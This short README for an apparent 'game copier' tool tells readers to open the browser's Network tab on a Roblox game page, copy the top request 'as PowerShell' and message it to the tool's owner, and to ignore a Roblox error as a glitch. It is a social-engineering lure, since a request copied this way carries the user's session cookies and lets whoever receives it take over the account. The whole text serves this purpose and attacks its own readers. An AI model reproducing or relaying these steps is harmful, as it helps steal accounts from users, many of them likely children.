ajdjda/gamecopier2/README.md

 go to inspect=newtwork= the one on the top is the name of the game you gonna copy you are going to right click it and then copy= copy as powershell if you did that message the owner the copied powershell and youre done the owner will now send you the file

-READ THIS!!
-IF YOU ARE ON THE WEBSITE IT SHOWS YOU AN ROBLOX ERROR JUST IGNORE IT IT IS A GLITCH